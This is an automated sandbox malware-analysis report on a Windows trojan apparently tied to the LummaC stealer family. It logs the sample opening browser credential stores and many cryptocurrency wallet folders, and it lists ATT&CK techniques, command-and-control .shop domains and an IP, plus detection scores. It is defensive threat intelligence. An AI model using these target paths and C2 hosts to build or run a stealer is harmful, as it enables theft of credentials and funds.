            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
            Source: Yara matchFile source: Process Memory Space: VoGtelkHSn.exe PID: 5444, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: VoGtelkHSn.exe PID: 5444, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Process Injection
            12
            Virtualization/Sandbox Evasion
            1
            OS Credential Dumping
            131
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Process Injection
            LSASS Memory12
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol31
            Data from Local System
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information
            Security Account Manager2
            Process Discovery
            SMB/Windows Admin Shares2
            Clipboard Data
            113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information
            NTDS1
            File and Directory Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Software Packing
            LSA Secrets12
            System Information Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            VoGtelkHSn.exe42%ReversingLabsWin32.Trojan.Generic
            VoGtelkHSn.exe41%VirustotalBrowse
            VoGtelkHSn.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            strollheavengwu.shop1%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
            https://strollheavengwu.shop/apiV0%Avira URL Cloudsafe
            liabilitynighstjsko.shop0%Avira URL Cloudsafe
            shortsvelventysjo.shop0%Avira URL Cloudsafe
            tolerateilusidjukl.shop0%Avira URL Cloudsafe
            incredibleextedwj.shop0%Avira URL Cloudsafe
            shortsvelventysjo.shop16%VirustotalBrowse
            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
            https://strollheavengwu.shop/api100%Avira URL Cloudmalware
            liabilitynighstjsko.shop17%VirustotalBrowse
            tolerateilusidjukl.shop14%VirustotalBrowse
            http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
            shatterbreathepsw.shop0%Avira URL Cloudsafe
            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta0%Avira URL Cloudsafe
            demonstationfukewko.shop0%Avira URL Cloudsafe
            incredibleextedwj.shop14%VirustotalBrowse
            https://strollheavengwu.shop/apiV10%VirustotalBrowse
            https://strollheavengwu.shop/apis0%Avira URL Cloudsafe
            shatterbreathepsw.shop17%VirustotalBrowse
            productivelookewr.shop0%Avira URL Cloudsafe
            strollheavengwu.shop0%Avira URL Cloudsafe
            demonstationfukewko.shop18%VirustotalBrowse
            https://strollheavengwu.shop/apiC0%Avira URL Cloudsafe
            https://strollheavengwu.shop/api12%VirustotalBrowse
            https://strollheavengwu.shop/P0%Avira URL Cloudsafe
            alcojoldwograpciw.shop0%Avira URL Cloudsafe
            https://strollheavengwu.shop/0%Avira URL Cloudsafe
            https://strollheavengwu.shop/1%VirustotalBrowse
            productivelookewr.shop16%VirustotalBrowse
            alcojoldwograpciw.shop17%VirustotalBrowse
            strollheavengwu.shop1%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            strollheavengwu.shop
            172.67.163.209
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            incredibleextedwj.shoptrue
            • 14%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            shortsvelventysjo.shoptrue
            • 16%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            tolerateilusidjukl.shoptrue
            • 14%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            liabilitynighstjsko.shoptrue
            • 17%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://strollheavengwu.shop/apitrue
            • 12%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            shatterbreathepsw.shoptrue
            • 17%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            demonstationfukewko.shoptrue
            • 18%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            productivelookewr.shoptrue
            • 16%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            strollheavengwu.shoptrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            alcojoldwograpciw.shoptrue
            • 17%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtabVoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://strollheavengwu.shop/apiVVoGtelkHSn.exe, 00000000.00000003.2047317168.0000000002C7A000.00000004.00000020.00020000.00000000.sdmpfalse
              • 10%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://duckduckgo.com/ac/?q=VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://www.google.com/images/branding/product/ico/googleg_lodp.icoVoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiVoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://crl.rootca1.amazontrust.com/rootca1.crl0VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://upx.sf.netAmcache.hve.4.drfalse
                        high
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://ocsp.rootca1.amazontrust.com0:VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.ecosia.org/newtab/VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaVoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brVoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://ac.ecosia.org/autocomplete?q=VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://strollheavengwu.shop/apisVoGtelkHSn.exe, 00000000.00000003.2134203398.0000000002CBB000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000002.2298398690.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgVoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgVoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://x1.c.lencr.org/0VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://x1.i.lencr.org/0VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchVoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refVoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://strollheavengwu.shop/apiCVoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://support.mozilla.org/products/firefoxgro.allVoGtelkHSn.exe, 00000000.00000003.2070520942.0000000005567000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://strollheavengwu.shop/PVoGtelkHSn.exe, 00000000.00000003.2057403228.0000000002C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://strollheavengwu.shop/VoGtelkHSn.exe, 00000000.00000002.2298398690.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C42000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 1%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              172.67.163.209
                                              strollheavengwu.shopUnited States
                                              13335CLOUDFLARENETUStrue
                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1431970
                                              Start date and time:2024-04-26 05:43:07 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 7s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:9
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:VoGtelkHSn.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:7f26737f63fcd5b7e2695f438e341075.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@2/5@1/1
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 94%
                                              • Number of executed functions: 38
                                              • Number of non-executed functions: 101
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              TimeTypeDescription
                                              05:43:58API Interceptor8x Sleep call for process: VoGtelkHSn.exe modified
                                              05:44:24API Interceptor1x Sleep call for process: WerFault.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              172.67.163.209o7b91j8vnJ.exeGet hashmaliciousLummaCBrowse
                                                asbpKOngY0.exeGet hashmaliciousLummaCBrowse
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    strollheavengwu.shopo7b91j8vnJ.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.163.209
                                                    http://myidealwedding.com.auGet hashmaliciousBitRAT, HTMLPhisherBrowse
                                                    • 104.21.15.198
                                                    iPUk65i3yI.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.15.198
                                                    asbpKOngY0.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.163.209
                                                    2FjvjcayaH.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.15.198
                                                    qrLdMv1QXG.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.15.198
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.163.209
                                                    LwnI84BBtb.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.15.198
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.15.198
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUSyX8787W7de.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 104.21.16.102
                                                    https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MDg4MzE4LCJtZXNzYWdlX2lkIjoiMGd4dnAwdGZzeWpiNm4yamRiMDRuYWd5IzcyNWE1YTc5LTgxYzQtNGM0Yy1iNmI1LTdmMTY0MTM2ZTE2NCIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjI0MzE4LCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtLmJyYWRlbnRvbmNjLmluZm8vP2VvdmlldWJyJnFyYz1yZW5lZS5zY2h3YXJ0ekBxci5jb20uYXUiLCJpbmRpdmlkdWFsX2lkIjoiODdiZTY3MTdlZjJmMThjYzI3YmMyMWQ4OTJhY2Q2NzAifQ.iusDS7mld4iiq9DDY82R1MJ9ToHxmMDW3SMbDENZOZQGet hashmaliciousHTMLPhisherBrowse
                                                    • 1.1.1.1
                                                    Payment Swift.docGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.74.152
                                                    https://marinatitle.comGet hashmaliciousUnknownBrowse
                                                    • 104.17.24.14
                                                    ad.msiGet hashmaliciousLatrodectusBrowse
                                                    • 172.67.219.28
                                                    https://ndw5xvotehflt.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                    • 104.21.53.38
                                                    https://cnmxukx5efilc7lvlel.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                    • 172.66.44.161
                                                    https://m7qfa5ng4lp7.blob.core.windows.net/m7qfa5ng4lp7/1.html?4rKpnF7821CfLO43wsacrvmomp962ETPJQJTKIDNZNNV65316UFUY14332V14#14/43-7821/962-65316-14332Get hashmaliciousPhisherBrowse
                                                    • 104.18.26.50
                                                    https://bocmyw606y.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                    • 172.66.44.172
                                                    https://uporniacomnuvidx.z13.web.core.windows.net/index.htmlGet hashmaliciousTechSupportScamBrowse
                                                    • 104.17.25.14
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    a0e9f5d64349fb13191bc781f81f42e1SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.32374.20351.xlsxGet hashmaliciousUnknownBrowse
                                                    • 172.67.163.209
                                                    file.exeGet hashmaliciousRisePro StealerBrowse
                                                    • 172.67.163.209
                                                    file.exeGet hashmaliciousPureLog Stealer, RisePro Stealer, zgRATBrowse
                                                    • 172.67.163.209
                                                    SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeGet hashmaliciousDBatLoaderBrowse
                                                    • 172.67.163.209
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.163.209
                                                    file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                    • 172.67.163.209
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.163.209
                                                    Iu4csQ2rwX.msiGet hashmaliciousAsyncRATBrowse
                                                    • 172.67.163.209
                                                    o7b91j8vnJ.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.163.209
                                                    SHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    • 172.67.163.209
                                                    No context
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.998775519341568
                                                    Encrypted:false
                                                    SSDEEP:96:3/BgRX5QcsohqPx1yLFS3QXIDcQGc6GcEdcw30+HbHg/opAnQPxVg7TFOy4UOnx0:vBOX5QcEK0YCnBjxpF7zuiF1Z24IO8u
                                                    MD5:EA60AE721C7CE19A750C25290AD839E5
                                                    SHA1:0637A75E125A5BA94B5E48B72379A32B269257CA
                                                    SHA-256:B80B02D091A5CE32A22CEDC620E4342A5382766C7A003D19886D2A9CE257B724
                                                    SHA-512:A9C37E4B82E6A48D2AFE08DC14E38E9767638EA39478A1DD61CEB4D4A8B87FB03AAA08ED49EFDDFFC717A40841AAFBB861866DDD8F852398CD9AD1366DAE88B3
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.7.6.6.4.8.9.4.6.2.0.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.7.6.6.4.9.3.8.3.7.1.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.a.e.d.a.3.a.-.c.1.8.7.-.4.4.7.4.-.9.1.9.4.-.c.2.8.c.6.a.8.3.a.d.d.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.3.8.6.5.c.4.-.d.b.8.3.-.4.9.4.2.-.a.4.6.9.-.7.5.8.7.c.c.d.f.a.5.8.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.o.G.t.e.l.k.H.S.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.4.4.-.0.0.0.1.-.0.0.1.4.-.b.8.8.0.-.a.d.f.6.8.b.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.2.7.5.f.6.f.c.e.f.e.7.1.0.7.6.6.6.0.7.4.e.4.c.9.9.b.9.7.6.e.0.0.0.0.f.f.f.f.!.0.0.0.0.3.2.5.0.9.2.e.2.1.e.3.0.8.9.9.7.9.7.5.6.b.e.1.9.0.4.7.c.4.4.b.c.4.d.0.3.6.d.c.6.!.V.o.G.t.e.l.k.H.S.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Fri Apr 26 03:44:09 2024, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):51510
                                                    Entropy (8bit):2.6590032344629932
                                                    Encrypted:false
                                                    SSDEEP:192:eUXKMaHW9y1UKkOzBF1L2jjOFPu52U+0el1lwOXjlsxvqVmawSnQDOsU:wW9aUozBF1ujOrT061SxiUavaOt
                                                    MD5:7717D53B95EAE50DABA784ED32B00C95
                                                    SHA1:61312DE246042A94E06FC9D5CA2FDC00F138240B
